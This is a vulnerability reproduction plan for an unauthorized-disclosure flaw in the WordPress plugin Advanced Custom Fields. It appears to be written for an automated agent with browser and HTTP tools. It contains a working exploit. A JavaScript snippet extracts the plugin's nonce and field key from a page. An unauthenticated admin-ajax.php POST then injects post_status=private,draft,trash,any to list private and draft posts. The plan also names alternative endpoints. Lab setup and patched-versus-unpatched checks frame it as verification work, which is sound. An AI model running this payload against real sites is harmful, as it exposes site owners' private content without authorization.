Research Plan: ACF Unauthenticated Private Post Disclosure (CVE-2026-4812)

1. Vulnerability Summary

The Advanced Custom Fields (ACF) plugin (<= 6.7.0) contains a missing authorization vulnerability in its AJAX field query endpoints. These endpoints (primarily acf/ajax/query) are designed to facilitate searching for posts, terms, or users within ACF fields like Relationship, Post Object, or User.

The vulnerability exists because the AJAX handler accepts filter parameters (such as post_status, post_type, or taxonomy) directly from the $_POST request and uses them to override the predefined restrictions configured for the specific ACF field. Because these endpoints can be accessed by unauthenticated users if an ACF form is displayed on the frontend, an attacker can manipulate these parameters to query and disclose information about draft posts, private posts, or restricted post types that the field settings would normally forbid.

2. Attack Vector Analysis

• Endpoint: /wp-admin/admin-ajax.php
• Action: acf/ajax/query (This is the primary unified AJAX endpoint for field queries in ACF 6.x).
• Vulnerable Parameters: post_status, post_type, taxonomy.
• Authentication: Unauthenticated (if the site has a frontend acf_form() or a public-facing ACF field).
• Preconditions:
  1. An ACF Field Group must exist containing a field type that uses AJAX search (e.g., Post Object or Relationship).
  2. The field must be rendered on a frontend page accessible to the attacker (usually via acf_form() or the [acf_form] shortcode).

3. Code Flow

1. Frontend Initiation: A user visits a page containing an ACF field with ajax: 1 enabled (default for Relationship/Post Object).
2. AJAX Request: When the user types in the search box, the ACF JavaScript sends a POST request to admin-ajax.php?action=acf/ajax/query.
3. Nonce Verification: The handler checks check_ajax_referer('acf_nonce', 'nonce').
4. Field Loading: The server-side logic calls acf_get_field( $_POST['field_key'] ) (found in includes/acf-field-functions.php) to retrieve the configured restrictions.
5. Parameter Merging (The Sink): The handler prepares arguments for WP_Query. It takes the restrictions from the $field array (e.g., $field['post_status'] = 'publish') but merges them with values provided in $_POST.
6. Vulnerability: Since there is no authorization check to see if the current user is allowed to override these filters, providing post_status=private in the POST request overrides the field's hardcoded requirement for publish, allowing WP_Query to return private data.

4. Nonce Acquisition Strategy

ACF localizes its configuration and nonces into a global JavaScript object named acf.

1. Setup: Create a public page containing an acf_form.
2. Navigation: Use browser_navigate to visit the page.
3. Extraction: Use browser_eval to extract the unified ACF nonce and the specific field key needed for the query.

JavaScript to execute:

// Get the unified ACF nonce
const nonce = acf.get('nonce');

// Get the field key from the first Post Object or Relationship field on the page
const fieldKey = jQuery('.acf-field[data-type="post_object"], .acf-field[data-type="relationship"]').first().data('key');

return { nonce, fieldKey };

5. Exploitation Strategy

Step 1: Discover Field Key and Nonce

Navigate to the page where the ACF form is rendered and run the extraction script above.

Step 2: Perform Unauthorized Query

Send an unauthenticated POST request to admin-ajax.php using the http_request tool.

Request Details:

• URL: http://<target>/wp-admin/admin-ajax.php
• Method: POST
• Headers: Content-Type: application/x-www-form-urlencoded
• Body:

  action=acf/ajax/query
  &nonce=[EXTRACTED_NONCE]
  &field_key=[EXTRACTED_FIELD_KEY]
  &s=[SEARCH_TERM]
  &post_status=private,draft,trash,any
  

Step 3: Parse Results

The response will be a JSON object containing a results array. If the exploit is successful, this array will contain the titles and IDs of private/draft posts that match the search term s.

6. Test Data Setup

To verify the vulnerability, the following environment must be prepared:

1. Target Content:
   • Create a post with post_status set to private titled "SECRET_DATA_EXPOSED".
   • Create a post with post_status set to draft titled "CONFIDENTIAL_DRAFT".
2. ACF Configuration:
   • Create a Field Group.
   • Add a Post Object field (Label: "Search Posts", Name: "search_posts").
   • Configure the field settings: Filter by Post Status = Published (this is the restriction we will bypass).
   • Set the Field Group location to Page == All.
3. Frontend Display:
   • Register a simple shortcode in functions.php to render the ACF form:

     add_shortcode('test_acf_form', function() {
         acf_form_head();
         acf_form(['post_id' => 'new_post', 'field_groups' => [ [GROUP_ID] ]]);
     });
     

   • Create a public page with the content [test_acf_form].

7. Expected Results

• Unpatched Version (<= 6.7.0): The AJAX response returns the private and draft posts in the results list.
• Patched Version (6.7.1): The server ignores the post_status parameter in the POST body if it exceeds the field's configuration, or it returns an error/empty results if the user lacks the read_private_posts capability.

8. Verification Steps

After the HTTP exploit attempt, verify the results:

1. Check the HTTP response status (should be 200).
2. Check the JSON body for the string SECRET_DATA_EXPOSED.
3. Use WP-CLI to confirm the post is indeed private:
   wp post list --post_status=private --fields=post_title,ID

9. Alternative Approaches

If acf/ajax/query is not the active endpoint (depending on specific Pro features or legacy settings), check for:

• action=acf/fields/post_object/query
• action=acf/fields/relationship/query

These follow the same logic: they check a nonce and then process query arguments. The payload remains the same: inject post_status or post_type into the POST body to override field-level restrictions.